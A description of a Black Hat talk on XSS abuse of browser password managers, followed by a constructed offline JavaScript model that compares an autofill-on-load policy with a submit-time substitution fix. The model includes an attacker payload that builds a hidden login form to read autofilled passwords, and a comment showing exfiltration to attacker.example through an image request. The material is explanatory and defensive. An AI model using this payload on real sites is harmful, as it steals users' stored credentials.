Explore how browser-based password managers can be abused through Cross-Site Scripting (XSS) in this Black Hat conference talk. Learn how an XSS payload can read and leak stored passwords even when the session cookie carries the HttpOnly flag: HttpOnly keeps document.cookie out of reach of script, but a password manager that auto-fills credentials into a login form on the same origin places the password itself in the DOM, where injected script can read it, and a stolen password outlives any session identifier. Examine the current generation of password managers across major browsers, and review findings from a large-scale study of password field usage on popular websites. Gain insight into attack patterns and security considerations, and receive recommendations for both website operators and users to guard against these threats. The talk also covers the Same-Origin Policy, the types of XSS, HTML5 autocomplete, and proposed solutions for hardening password managers.
Session Identifiers are for Now, Passwords are Forever - XSS-Based Abuse of Browser Password Managers
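The following is an added example, not code from the talk or from any browser. It models the attack the description above outlines and one shape of fix: a stub document and password manager, constructed so the whole thing runs offline in Node, with an injected-script payload that builds an off-screen login form, lets the manager fill it, and reads the values back. Two fill policies are compared: filling on page load keyed only on the origin (the behaviour the talk criticises), and filling a placeholder that is replaced by the real password only at submit time and only when the form posts to the action the credential was saved for (a submit-time substitution scheme assumed here for illustration). The record names, origins, the `bank.example` / `attacker.example` hosts and the credential values are all constructed.

```javascript
// Credential record as a password manager might store it (constructed).
const SAVED = {
  origin: "https://bank.example",
  action: "https://bank.example/login",
  username: "alice",
  password: "hunter2",
};

// Policy A: on page load, fill any form in the saved origin. Injected XSS runs
// in that same origin, so the Same-Origin Policy offers no distinction here.
const fillOnLoadByOrigin = {
  onFormAdded(form, ctx) {
    if (ctx.origin !== SAVED.origin) return;
    for (const f of form.children) {
      if (f.type === "password") f.value = SAVED.password;
      else if (f.type === "text") f.value = SAVED.username;
    }
  },
  onSubmit(form) {
    return Object.fromEntries(form.children.map((f) => [f.name, f.value]));
  },
};

// Policy B (assumed fix for illustration): the DOM only ever sees a placeholder;
// the real password is swapped into the outgoing request only if the form's
// action is the one the credential was saved for.
const PLACEHOLDER = "\u2022".repeat(8);
const fillAtSubmitToSavedAction = {
  onFormAdded(form, ctx) {
    if (ctx.origin !== SAVED.origin) return;
    for (const f of form.children) {
      if (f.type === "password") f.value = PLACEHOLDER;
      else if (f.type === "text") f.value = SAVED.username;
    }
  },
  onSubmit(form) {
    const body = Object.fromEntries(form.children.map((f) => [f.name, f.value]));
    for (const f of form.children) {
      if (f.type === "password" && f.value === PLACEHOLDER) {
        body[f.name] = form.action === SAVED.action ? SAVED.password : "";
      }
    }
    return body;
  },
};

// Minimal document stub: just enough DOM surface for the payload to run offline.
// appendChild on the body triggers the manager's fill pass, as a browser would
// after the form enters the document; submit() returns the request body the
// manager would send (a real form.submit() returns nothing).
function makeDocument(origin, manager) {
  const ctx = { origin };
  return {
    createElement(tag) {
      return {
        tag, type: "", name: "", value: "", action: "", children: [],
        appendChild(c) { this.children.push(c); },
        submit() { return manager.onSubmit(this); },
      };
    },
    body: { appendChild(el) { if (el.tag === "form") manager.onFormAdded(el, ctx); } },
  };
}

// Builds a username/password form posting to `action` and inserts it.
function buildLoginForm(doc, action) {
  const form = doc.createElement("form");
  form.action = action;
  const user = doc.createElement("input"); user.type = "text"; user.name = "username";
  const pass = doc.createElement("input"); pass.type = "password"; pass.name = "password";
  form.appendChild(user); form.appendChild(pass);
  doc.body.appendChild(form);   // off-screen in a real browser; fill pass runs now
  return form;
}

// Attacker payload: what an XSS injection on the login origin does. HttpOnly
// keeps the session cookie away from script, but the password manager hands the
// script the password itself, which is long-lived and often reused elsewhere.
function stealAutofilledCredentials(doc, exfil) {
  const form = buildLoginForm(doc, SAVED.action);  // real action is public anyway
  const [user, pass] = form.children;
  const creds = { username: user.value, password: pass.value };
  if (creds.password) exfil(creds);  // e.g. new Image().src = "https://attacker.example/?" + ...
  return creds;
}

// Submits a login form to `action` and returns the body the manager would send.
function submitLoginForm(doc, action) {
  return buildLoginForm(doc, action).submit();
}
```

Under policy A the payload reads the real password straight out of the field, and re-pointing the form at an attacker-controlled action leaks it through a submit as well. Under policy B the script only ever sees the placeholder, and a form posting anywhere but the saved action gets an empty password. This does not fix the XSS: injected script can still act within the victim's session, or overlay a fake login prompt and capture what the user types. What it does is push the impact back down to the session, which is the point of the talk's title.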